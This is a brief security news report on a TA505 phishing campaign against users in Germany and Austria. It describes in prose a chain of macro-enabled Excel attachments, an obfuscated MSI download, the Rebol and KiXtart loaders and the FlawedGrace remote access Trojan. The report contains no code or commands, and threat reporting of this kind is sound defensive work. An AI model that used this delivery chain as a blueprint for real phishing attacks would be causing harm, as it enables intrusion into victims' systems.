Cybersecurity Researchers discovered a malicious email campaign targeting users in Germany and Austria. Security experts have linked the current campaign to the TA505 cybercriminals group, whose members used the Dridex banking Trojan and tools such as FlawedAmmyy, FlawedGrace, the Neutrino botnet and Locky ransomware in past attacks.
The attacks began with a series of small waves of e-mails delivering only a few thousand messages at each stage, and then the number of letters spiked in late September to hundreds of thousands.
Criminals trick users into activating macros after opening malicious Microsoft Excel attachments, and then downloading an obfuscated MSI file to install the next stage downloaders. The latter installs an updated version of the FlawedGrace remote access Trojan.
FlawedGrace, first discovered in November 2017, is a fully functional C ++ remote access Trojan specifically designed to prevent reverse engineering and analysis. The Trojan can communicate with the C&C server to receive instructions and send the results of these commands back to the server.
In the latest malicious campaign, the criminals changed their tactics, which now includes the use of refurbished intermediate loaders such as Rebol and KiXtart, instead of Get2, previously used by the group to perform reconnaissance, download and install the RAT of the final stage.